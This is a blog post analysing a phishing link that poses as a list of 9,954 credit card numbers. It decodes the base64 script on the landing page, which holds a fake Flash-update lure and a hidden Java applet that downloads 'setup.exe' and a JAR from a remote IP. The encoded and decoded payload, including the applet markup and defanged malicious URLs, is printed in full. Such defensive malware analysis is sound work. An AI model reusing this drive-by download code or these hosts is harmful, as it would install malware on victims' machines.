I got a phishing mail, and I followed it

Rishi Narang
 /  hacking  /
I got a phishing mail, and I followed it

We come across so many links via social networking websites, and we unknowingly click many of these. The malicious links have catastrophic results and the system as well as yours privacy is either compromised or your data takes the hit. Here is one such analysis of a link dated 17.April.2012 that I came across via Twitter and LinkedIn.

NOTE: All links have been appended with ‘non-clickable’ suffix hxxp:// to prevent mistaken clicks.

Someone posted this link (hxxp://pastebin.com/dRGHt7hy) on a tweet. On checking, it was a list of URLs (actually single URL pasted multiple times – a sign of desperation),

  • hxxp://tinyurl.com/saw87hujnworeg
  • hxxp://tinyurl.com/saw87hujnworeg
  • hxxp://tinyurl.com/saw87hujnworeg
  • hxxp://tinyurl.com/saw87hujnworeg

9954 credit card numbers

It states this link has 9954 credit card numbers. The first malicious hint is – Why not posting it directly rather than pasting the same link 4 times in an entry.

Next, this is too much of a luring target; so walk safe. So I opened the link in Malzilla (http://malzilla.sourceforge.net/) a malware hunting tool. I disabled the auto-redirect. The link hxxp://tinyurl.com/saw87hujnworeg redirected to hxxp://212.95.43.243/jdb/inf.php?id=0b740ebcc2abbc5512c4875a0f74965b which opened as text fields with scripts. The file contained only a ‘doubtful’ script with some headings and titles.

Here is the only important script contained within the page. Let’s do the analysis.

This script if too complex to understand due to large variable names, so lets first change the variable names to shorter versions for better understanding. Here is the modified script with short variable names without changing the logic and working of it.

Now, it is easy to understand the logic and working of the script. First, let us decode the setTimeout and document.write fields. They look like Base64 Encoded so, let’s try to decode them. The encoded strings are,

1. QWRvYmUgRmxhc2ggbXVzdCBiZSB1cGRhdGVkIHRvIHZpZXcgdGhpcywgcGxlYXNlIGluc3RhbGwgdGhlIGxhdGVzdCB2ZXJzaW9uIQ==
2. aHR0cDovLzIxMi45NS40My4yNDMvamRiL2xpYi9hZG9iZS5waHA/aWQ9MGI3NDBlYmNjMmFiYmM1NTEyYzQ4NzVhMGY3NDk2NWI=
3. DQoJCTxhcHBsZXQgd2lkdGg9IjBweCIgaGVpZ2h0PSIwcHgiIGNvZGU9IlNpdGVMb2FkZXIuY2xhc3MiIGFyY2hpdmU9Imh0dHA6Ly8yM

TIuOTUuNDMuMjQzL2pkYi9saWIvamF2YS9saXZlcy8wYjc0MGViY2MyYWJiYzU1MTJjNDg3NWEwZjc0OTY1Yi5qYXIiPg0KCQk8cGFyYW
0gbmFtZT0id2NaUE4iIHZhbHVlPSJodHRwOi8vMjEyLjk1LjQzLjI0My9qZGIvbGliL2xvYWQucGhwP2lkPTBiNzQwZWJjYzJhYmJjNTU
xMmM0ODc1YTBmNzQ5NjViIj4NCgkJPHBhcmFtIG5hbWU9InY4VE9YIiB2YWx1ZT0ic2V0dXAuZXhlIj4NCgkJPHBhcmFtIG5hbWU9Ikxl
Z3ltIiB2YWx1ZT0id3d3LmRvZ3NjYXN0LmNvbSI+DQoJCTxwYXJhbSBuYW1lPSJNcEJERyIgdmFsdWU9IkFQUERBVEEiPg0KCQk8L2Fwc
GxldD4=

Decoded strings are,

Adobe Flash must be updated to view this, please install the latest version!

1. hxxp://212.95.43.243/jdb/lib/adobe.php?id=0b740ebcc2abbc5512c4875a0f74965b
2. <applet width="0px" height="0px" code="SiteLoader.class"
3. archive="hxxp://212.95.43.243/jdb/lib/java/lives/0b740ebcc2abbc5512c4875a0f74965b.jar"> 

<param name="wcZPN" value="hxxp://212.95.43.243/jdb/lib/load.php?id=0b740ebcc2abbc5512c4875a0f74965b"> 
<param name="v8TOX" value="setup.exe"> 
<param name="Legym" value="www.dogscast.com"> 
<param name="MpBDG" value="APPDATA"> 
</applet>

The first decoded string has been set to entice the victim to click installing the ‘latest version’ of flash via their malicious link. So, we can see it will again issue a GET request to the following links,

  1. hxxp://212.95.43.243/jdb/lib/adobe.php?id=0b740ebcc2abbc5512c4875a0f74965b
  2. hxxp://212.95.43.243/jdb/lib/java/lives/0b740ebcc2abbc5512c4875a0f74965b.jar
  3. hxxp://212.95.43.243/jdb/lib/load.php?id=0b740ebcc2abbc5512c4875a0f74965b

And parameters are,

  1. name=“wcZPN” value=“hxxp://212.95.43.243/jdb/lib/load.php?id=0b740ebcc2abbc5512c4875a0f74965b”
  2. name=“v8TOX” value=“setup.exe”
  3. name=“Legym” value=“www.dogscast.com
  4. name=“MpBDG” value=“APPDATA”

Let us know access these URLs.

  1. First I accessed the adobe.php URL (hxxp://212.95.43.243/jdb/lib/adobe.php?id=0b740ebcc2abbc5512c4875a0f74965b) via Malzilla and it downloaded a file “Adobe-Flash_WIN.exe” on my system. The size of this file is approx 1.16 Mb. This file when scanned via VirusTotal had the catch rate of 2/42 anti-malware products. Now, this is scary. I didn’t get a chance to do the run time analysis of this file, but yes will post it in the next blog.

  2. On accessing the second URL (hxxp://212.95.43.243/jdb/lib/java/lives/0b740ebcc2abbc5512c4875a0f74965b.jar) it downloads a JAR file “0b740ebcc2abbc5512c4875a0f74965b.jar”. This file when extracted results in the “META-INF” directory and “SiteLoader.class” file. The contents of META-INF includes,

    • JUBUHUSE.DSA
    • JUBUHUSE.SF
    • MANIFEST.MF

Now let’s analyze the third URL load.php (hxxp://212.95.43.243/jdb/lib/load.php?id=0b740ebcc2abbc5512c4875a0f74965b) via Malzilla. When accessed, this link downloads a “setup.exe” file on the host. This file is the same as the previous file as per the SHA56 hash cb3869fa81086e4f91a61663ccac100f5099ccf4564a971f955f1a61d37aecf5.

This is a brief analysis of a phishing link, which started via twitter as a PASTEBIN link, and made its way to reach your system through various files.

Cover Image: Photo by Wynand van Poortvliet on Unsplash